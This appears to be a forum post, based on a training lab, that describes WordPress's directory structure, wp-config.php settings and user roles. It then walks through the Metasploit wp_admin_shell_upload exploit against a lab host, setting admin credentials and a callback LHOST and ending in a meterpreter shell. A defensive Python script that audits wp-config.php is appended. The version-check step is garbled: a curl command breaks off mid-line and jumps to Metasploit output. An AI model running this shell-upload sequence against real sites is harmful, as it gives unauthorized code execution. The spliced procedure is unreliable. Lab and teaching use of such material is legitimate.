November 11, 2022 at 9:33 AM
[hide]
Basic Wordpress and Wordpress Structure

Wordpress Structure

WordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will focus on a default WordPress installation on an Ubuntu Linux web server. WordPress requires a fully installed and configured LAMP stack (Linux operating system, Apache HTTP Server, MySQL database, and the PHP programming language) before installation on a Linux host. After installation, all WordPress supporting files and directories will be accessible in the webroot located at /var/www/html.

Below is the directory structure of a default WordPress install, showing the key files and subdirectories necessary for the website to function properly.

    tree -L 1 /var/www/html
    ├── index.php
    ├── license.txt
    ├── readme.html
    ├── wp-activate.php
    ├── wp-admin
    ├── wp-blog-header.php
    ├── wp-comments-post.php
    ├── wp-config.php
    ├── wp-config-sample.php
    ├── wp-content
    ├── wp-cron.php
    ├── wp-includes
    ├── wp-links-opml.php
    ├── wp-load.php
    ├── wp-login.php
    ├── wp-mail.php
    ├── wp-settings.php
    ├── wp-signup.php
    ├── wp-trackback.php
    └── xmlrpc.php

Key WordPress Files

The root directory of WordPress contains files that are needed to configure WordPress to function correctly.

- index.php is the homepage of WordPress.
- license.txt contains useful information such as the version of WordPress installed.
- wp-activate.php is used for the email activation process when setting up a new WordPress site.
- wp-admin folder contains the login page for administrator access and the backend dashboard. Once a user has logged in, they can make changes to the site based on their assigned permissions.
The login page can be located at one of the following paths:

- /wp-admin/login.php
- /wp-admin/wp-login.php
- /login.php
- /wp-login.php

This file can also be renamed to make it more challenging to find the login page.

- xmlrpc.php is a file representing a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.

WordPress Configuration File

The wp-config.php file contains information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can be useful in troubleshooting.

wp-config.php

Code: php

    <?php
    /** The name of the database for WordPress */
    define( 'DB_NAME', 'database_name_here' );

    /** MySQL database username */
    define( 'DB_USER', 'username_here' );

    /** MySQL database password */
    define( 'DB_PASSWORD', 'password_here' );

    /** MySQL hostname */
    define( 'DB_HOST', 'localhost' );

    /** Authentication Unique Keys and Salts */
    define( 'AUTH_KEY',         'put your unique phrase here' );
    define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
    define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
    define( 'NONCE_KEY',        'put your unique phrase here' );
    define( 'AUTH_SALT',        'put your unique phrase here' );
    define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
    define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
    define( 'NONCE_SALT',       'put your unique phrase here' );

    /** WordPress Database Table prefix */
    $table_prefix = 'wp_';

    /** For developers: WordPress debugging mode. */
    define( 'WP_DEBUG', false );

    /** Absolute path to the WordPress directory. */
    if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
    }

    /** Sets up WordPress vars and included files. */
    require_once ABSPATH . 'wp-settings.php';

Key WordPress Directories

The wp-content folder is the main directory where plugins and themes are stored. The subdirectory uploads/ is usually where any files uploaded to the platform are stored. These directories and files should be carefully enumerated, as they may contain sensitive data that could lead to remote code execution or exploitation of other vulnerabilities or misconfigurations.

WP-Content

    tree -L 1 /var/www/html/wp-content
    ├── index.php
    ├── plugins
    └── themes

WP-Includes

wp-includes contains everything except for the administrative components and the themes that belong to the website. This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.

    tree -L 1 /var/www/html/wp-includes
    ├── theme.php
    ├── update.php
    ├── user.php
    ├── vars.php
    ├── version.php
    ├── widgets
    ├── widgets.php
    ├── wlwmanifest.xml
    ├── wp-db.php
    └── wp-diff.php

WordPress User Roles

There are five types of users in a standard WordPress installation.

Role | Description
--- | ---
Administrator | This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.
Editor | An editor can publish and manage posts, including the posts of other users.
Author | Authors can publish and manage their own posts.
Contributor | These users can write and manage their own posts but cannot publish them.
Subscriber | These are normal users who can browse posts and edit their profiles.

Gaining access as an administrator is usually needed to obtain code execution on the server.
However, editors and authors might have access to certain vulnerable plugins that normal users do not.

Manual Enumeration Procedure for a Wordpress Website

Wordpress Version Check

Check the Wordpress version using the curl command given below or by viewing the page source.

    command: curl -s -X GET http://blog.inlanefreight.com | grep '

    search wp_admin

Matching Modules

    0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21  excellent  Yes  WordPress Admin Shell Upload

Module Selection:

    msf5 > use 0
    msf5 exploit(unix/webapp/wp_admin_shell_upload) >

Module Options

    msf5 exploit(unix/webapp/wp_admin_shell_upload) > options

    Module options (exploit/unix/webapp/wp_admin_shell_upload):

    PASSWORD              yes  The WordPress password to authenticate with
    Proxies               no   A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS                yes  The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
    RPORT      80         yes  The target port (TCP)
    SSL        false      no   Negotiate SSL/TLS for outgoing connections
    TARGETURI  /          yes  The base path to the wordpress application
    USERNAME              yes  The WordPress username to authenticate with
    VHOST                 no   HTTP server virtual host

    Exploit target:

    Id  Name
    --  ----
    0   WordPress

Set and Exploitation

    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.com
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

    meterpreter > getuid
    Server username: www-data (33)

Practicing Sites:
https://tryhackme.com/room/allinonemj
https://tryhackme.com/room/wordpresscve202129447
https://tryhackme.com/room/blog

Website Security Testing Site: https://sitecheck.sucuri.net/

Install https://github.com/cyberteach360/Hacking-Wordpress
[/hide]
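
An added example, not part of the original post: a Python audit of the wp-config.php settings described above, flagging sample placeholders left in the database constants and keys/salts, reused key values, and WP_DEBUG left on. The function names, the MIN_KEY_LEN threshold and the SAMPLE text are assumptions made for this example.

```python
import re

# Placeholder strings from the sample wp-config.php listing above.
PLACEHOLDERS = {"put your unique phrase here", "database_name_here",
                "username_here", "password_here"}
KEY_NAMES = [p + s for s in ("_KEY", "_SALT")
             for p in ("AUTH", "SECURE_AUTH", "LOGGED_IN", "NONCE")]
MIN_KEY_LEN = 32  # assumed floor for this example; set to local policy

# Strings are matched first so comment markers inside a salt are left alone.
TOKEN_RE = re.compile(
    r"""'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|/\*.*?\*/|(?://|#)[^\n]*""", re.S)
DEFINE_RE = re.compile(
    r"""define\(\s*['"](\w+)['"]\s*,\s*"""
    r"""(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|(\w+))\s*\)""", re.S)

# Constructed sample: a commented-out define() and debug mode left on.
SAMPLE = r"""<?php
// define( 'WP_DEBUG', false );
define( 'DB_PASSWORD', 'password_here' );
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'WP_DEBUG', true );
"""

def parse_defines(src):
    """Return {constant: value} for literal define() calls outside comments."""
    code = TOKEN_RE.sub(
        lambda m: m.group(0) if m.group(0)[0] in "'\"" else " ", src)
    return {name: (bare.lower() if bare else sq or dq)
            for name, sq, dq, bare in DEFINE_RE.findall(code)}

def audit_config(src):
    """Return findings for the text of a wp-config.php file."""
    consts, findings = parse_defines(src), []
    for name in ("DB_NAME", "DB_USER", "DB_PASSWORD"):
        if consts.get(name) in PLACEHOLDERS:
            findings.append(f"{name}: sample placeholder")
    for name in KEY_NAMES:
        value = consts.get(name)
        if value is None:
            findings.append(f"{name}: not defined")
        elif value in PLACEHOLDERS or len(value) < MIN_KEY_LEN:
            findings.append(f"{name}: placeholder or too short")
    keys = [consts[n] for n in KEY_NAMES if n in consts]
    if len(set(keys)) < len(keys):
        findings.append("keys/salts: value reused")
    if consts.get("WP_DEBUG") in ("true", "1"):
        findings.append("WP_DEBUG: enabled")
    return findings
```

Pass the file's text, for example `audit_config(open("/var/www/html/wp-config.php").read())`; an empty list means none of these checks fired.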
